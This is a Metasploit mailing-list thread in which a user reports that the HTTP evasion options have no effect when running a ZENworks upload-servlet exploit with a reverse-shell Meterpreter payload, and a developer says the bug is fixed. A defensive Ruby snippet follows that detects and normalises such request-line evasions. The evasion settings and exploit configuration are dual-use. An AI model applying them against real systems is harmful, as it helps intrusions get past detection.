Metasploit mailing list archives

Re: HTTP Evasions not working as intended


From: egypt () metasploit com
Date: Fri, 6 Jan 2012 20:19:12 -0700

Fixed in latest trunk, thanks for the report!

egypt

On Fri, Jan 6, 2012 at 3:11 AM, Ashish Joshi <joshi.ashish22 () gmail com> wrote:
Hi,

I am trying to use various HTTP evasions for some HTTP server based exploits
(say exploit/windows/http/zenworks_uploadservlet) or similar exploits. I am
making use of various evasions supported. However, when I run the exploit,
I don’t see any difference b/w a normal exploitation and evasive
exploitation. I checked respective pcaps and they all look the same. I have
tried using the following evasions:

HTTP::method_random_case
HTTP::uri_fake_end
HTTP::pad_fake_headers

.. and a couple more.

Here is my config:

msf  exploit(zenworks_uploadservlet) > set

Global
======

No entries in data store.

Module: windows/http/zenworks_uploadservlet
===========================================

  Name                          Value
  ----                          -----
  EnableUnicodeEncoding         true
  FingerprintCheck              false
  HTTP::header_folding          false
  HTTP::method_random_case      true
  HTTP::method_random_invalid   false
  HTTP::method_random_valid     false
  HTTP::pad_fake_headers        false
  HTTP::pad_fake_headers_count  0
  HTTP::pad_get_params          false
  HTTP::pad_get_params_count    16
  HTTP::pad_method_uri_count    1
  HTTP::pad_method_uri_type     space
  HTTP::pad_post_params         false
  HTTP::pad_post_params_count   16
  HTTP::pad_uri_version_count   1
  HTTP::pad_uri_version_type    space
  HTTP::uri_dir_fake_relative   false
  HTTP::uri_dir_self_reference  false
  HTTP::uri_encode_mode         hex-normal
  HTTP::uri_fake_end            true
  HTTP::uri_fake_params_start   false
  HTTP::uri_full_url            false
  HTTP::uri_use_backslashes     false
  InitialAutoRunScript
  LHOST                         10.204.136.1
  LPORT                         4444
  PAYLOAD                       java/meterpreter/reverse_tcp
  RHOST                         8.0.0.101
  RPORT                         80
  TARGET                        0
  UserAgent                     Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  VERBOSE                       false
  WfsDelay                      0

This doesn’t seem to be working. Is there any bug related to it? I checked
the bug-tracker and couldn’t find a relevant one.

How do I make it work? Any help would be appreciated.

Thanks,
Ashish
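The report above hinges on one observation: the evasive and non-evasive pcaps looked identical, so the HTTP::* options never changed what went on the wire. As an added example (not code from this thread, and not Metasploit's own code), here is a small Ruby check a defender can run over request heads pulled out of a capture. It does two things: it lists which evasion families a request actually carries (method case changes, method/URI padding, self-referencing or fake-relative directory segments, backslashes, needless percent-encoding, padded fake headers), and it reduces the request line to a canonical form so a signature can match whether or not the evasions were applied. The EXPECTED_HEADERS list, the sample request strings and the indicator names are this example's own constructions; they approximate the option families by name and are not derived from Metasploit's implementation.

```ruby
# Added example, not code from the thread or from Metasploit: a defender-side
# check for HTTP request-line evasions of the kind the HTTP::* options above
# are meant to produce. Run it over request heads extracted from a pcap to see
# whether an evasion actually reached the wire, and to get a canonical
# request line that signatures can match regardless of the evasion.

# Headers this (hypothetical) service is expected to receive; anything else
# is treated as padding. Adjust per service.
EXPECTED_HEADERS = %w[Host User-Agent Content-Type Content-Length Connection].freeze

# Parse a raw HTTP request head (request line plus headers) into a hash.
# Both spaces and tabs are accepted as separators, since method/URI padding
# evasions may use either.
def parse_request(raw)
  head, _body = raw.split("\r\n\r\n", 2)
  lines = head.split("\r\n")
  request_line = lines.shift
  method, uri, version = request_line.split(/[ \t]+/, 3)
  headers = lines.map do |line|
    name, value = line.split(':', 2)
    [name.strip, value.to_s.strip]
  end
  { method: method, uri: uri, version: version, headers: headers,
    request_line: request_line }
end

# Reduce a request URI to a canonical path: drop the query string, map
# backslashes to slashes, decode percent-encoding, and resolve "." and ".."
# segments. A trailing slash is dropped as well.
def canonical_uri(uri)
  path = uri.split('?', 2).first.gsub('\\', '/')
  path = path.gsub(/%([0-9A-Fa-f]{2})/) { Regexp.last_match(1).hex.chr }
  segments = []
  path.split('/', -1).each do |seg|
    case seg
    when '', '.' then next
    when '..' then segments.pop
    else segments << seg
    end
  end
  '/' + segments.join('/')
end

# Canonical "METHOD /path VERSION" line for signature matching.
def canonical_request_line(raw)
  req = parse_request(raw)
  "#{req[:method].upcase} #{canonical_uri(req[:uri])} #{req[:version]}"
end

# List the evasion indicators present in a raw request. The names mirror the
# HTTP::* option families from the thread but are this example's own labels.
def evasion_indicators(raw)
  req = parse_request(raw)
  found = []
  found << 'method_case' if req[:method] != req[:method].upcase
  found << 'method_uri_padding' if req[:request_line] =~ /\A\S+([ \t]{2,}|\t)/
  found << 'uri_self_reference' if req[:uri].include?('/./')
  found << 'uri_fake_relative' if req[:uri].include?('/../')
  found << 'uri_backslashes' if req[:uri].include?('\\')
  # Percent-encoding of unreserved characters (letters, digits, -._~) is never
  # required, so it is a strong hint of URI-encoding obfuscation.
  encoded_unreserved = req[:uri].scan(/%([0-9A-Fa-f]{2})/).any? do |match|
    match.first.hex.chr =~ /[A-Za-z0-9\-._~]/
  end
  found << 'unneeded_percent_encoding' if encoded_unreserved
  extra = req[:headers].map(&:first).reject { |h| EXPECTED_HEADERS.include?(h) }
  found << 'fake_headers' unless extra.empty?
  found
end

# Constructed sample requests: a plain one, and one hand-built to carry
# several of the evasions at once (not captured from Metasploit).
PLAIN_REQUEST = "GET /app/upload HTTP/1.1\r\nHost: 8.0.0.101\r\n" \
                "User-Agent: Mozilla/4.0\r\n\r\n"
EVADED_REQUEST = "gEt\t/./%3fa=b/../app/%75pload HTTP/1.1\r\nHost: 8.0.0.101\r\n" \
                 "X-Cache-Token: 91fa\r\nX-Orig-Req: none\r\n" \
                 "User-Agent: Mozilla/4.0\r\n\r\n"

if __FILE__ == $PROGRAM_NAME
  puts "plain  : #{canonical_request_line(PLAIN_REQUEST)} #{evasion_indicators(PLAIN_REQUEST).inspect}"
  puts "evaded : #{canonical_request_line(EVADED_REQUEST)} #{evasion_indicators(EVADED_REQUEST).inspect}"
end
```

Run over the two constructed requests, both canonicalise to `GET /app/upload HTTP/1.1`, while only the second one yields indicators. Applied to the requests in the original poster's two pcaps, an empty indicator list for the "evasive" run is exactly the symptom reported: the options were set but nothing about the request changed.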






_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework